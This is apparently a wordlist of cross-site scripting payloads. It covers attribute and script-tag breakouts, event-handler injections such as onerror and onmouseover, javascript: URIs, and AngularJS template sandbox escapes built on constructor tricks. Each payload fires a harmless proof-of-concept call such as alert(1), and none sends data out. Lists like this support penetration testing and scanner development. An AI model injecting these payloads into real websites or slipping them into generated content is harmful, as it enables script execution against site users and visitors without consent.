"><script>alert(1)</script>
"><script>prompt(1)</script>
"><script>confirm(1)</script>
" width=500 height=500 onclick=javascript:alert(1);//
" width=500 height=500 onmouseover=javascript:alert(1);//
<img src=x onerror=alert(1)>
" onmouseover=alert(1) a="
javascript:alert(1)
'; alert(1); //
{{constructor.constructor('alert(1)')()}}
{{[].pop.constructor&#40'alert\u00281\u0029'&#41&#40&#41}}
{{0[a='constructor'][a]('alert(1)')()}}
{{$eval.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}
\"-alert(1)}//
<><img src=1 onerror=alert(1)>
<body onresize=print()>